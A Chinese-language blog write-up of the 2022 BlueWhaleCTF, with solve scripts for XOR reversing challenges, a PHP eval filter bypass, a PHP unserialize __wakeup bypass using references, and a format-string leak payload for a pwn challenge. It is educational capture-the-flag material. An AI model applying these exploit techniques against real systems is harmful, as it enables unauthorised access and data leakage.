2022 BlueWhaleCTF WriteUp

字数统计: 622字   |   阅读时长≈ 3分

2022 BlueWhaleCTF WriteUp

0x01 RE

easyxor

简单的xor

image-20220502104255229

异或后的字符串

image-20220502104324772

f2 = [0x44,0x4E,0x43,0x45,0x59,0x5A,0X6D,0X50,0x7D,0x13,0x51,0x7D,0x54,0x11,0X50,0X5B,0X5B,0X5B,0X5B,0X5B,0X5B,0X5B,0X5B,0X5B,0X5B,0x7D,0x47,0x16,0x51,0x5B,0x5F]
flag=''
for i in range(31):
flag +=chr(f2[i]^0x22)
print(flag)

oh_my_python

pyc反编译一下

image-20220502104417566

吧answer当flag输出即可

def chall():
flag = ''
l = 'CKNOPWY_acfghkloruwy{}'
index = [
10,
14,
8,
11,
20,
0,
8,
2,
7,
6,
3,
17,
7,
1,
3,
5,
2,
7,
12,
3,
5,
7,
4,
19,
9,
7,
18,
15,
16,
13,
21]
answer = ''
for i in index:
answer += l[i]
print(answer)
if __name__ == '__main__':
chall()

xpu

把xpu脱壳

https://upx.github.io/

然后解base64就行

image-20220501110644696

asm_master

汇编:

image-20220502104700343

然后拿出gcc编译一下:

gcc编译成.o,扔IDA里,就能看到printf

image-20220501110736281

0x02 Misc

Checkin

仿照的pwnhub的签到,二维码链接#后面就是flag

simplepcap

image-20220502104954164

流量里有个macos的程序,提出来

image-20220501144003244

image-20220501145109980

v7 = [0x25,0x2F,0x22,0x24,0x38,0x21,0x22,0x21,0x3A,0x1C,0x33,0x20,0x22,0x33,0x1C,0x2A,0x30,0x1C,0x35,0x26,0x31,0x3A,0x1C,0x26,0x22,0x30,0x3a,0x3E]
flag = ''
for i in range(len(v7)):
flag+= chr(v7[i]^0x43)
print(flag)

warmatap

照着视频的节拍敲键盘就行

flag{wozuixihuanwarmale}

0x03 Web

你比香农都牛逼

Ctrl+S保存下来,在js最后jsfuck

image-20220501111112043

old php game

<?php
error_reporting(0);
require __DIR__.'/flag.php';
$exam = 'return\''.sha1(time()).'\';';
if (!isset($_GET['flag'])) {
echo '<a href="./?flag='.$exam.'">Click here</a>';
}
else if (strlen($_GET['flag']) != strlen($exam)) {
echo 'Not allowed length';
}
else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
echo 'Not allowed keyword';
}
else if (eval($_GET['flag']) === sha1($flag)) {
echo $flag;
}
else {
echo 'What\'s going on?';
}
echo '<hr>';
highlight_file(__FILE__);

$exam的长度为49,然后过滤了一堆:

``|"|.|\\|(|)|[|]|_|flag|echo|print|require|include|die|exit`

所以如下构造:用短标签闭合

image-20220501111302529

very old php game

eval(string $code)把里面的字符串当做PHP代码来执行,所以会执行var_dump($$a),$a = hello; 所以$$a = $hello ,所以可以用超全局数组 $GLOBALS 开输出flag

image-20220501111446624

Baby Unserialize

考点应该是PHP垃圾回收机制+wakeup绕过+变量重定向,没用上那个垃圾回收

<?php
require_once "flag.php";
class Foo
{
private $i_am_flag;
public $i_am_not_flag;
public function __construct() {
$this->i_am_not_flag =&$this->i_am_flag;
}
public function __wakeup()
{
$this->i_am_not_flag = 'I am not flag!';
}
}
$O = new Foo();
echo base64_encode(serialize($O));

image-20220501204600680

0x04 PWN

flag_in_stack

简单的格式化字符串,读入了flag,所以泄露一下就行

image-20220502105729544

%10$p%11$p%12$p%13$p

image-20220501205030555

image-20220501204802921


谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。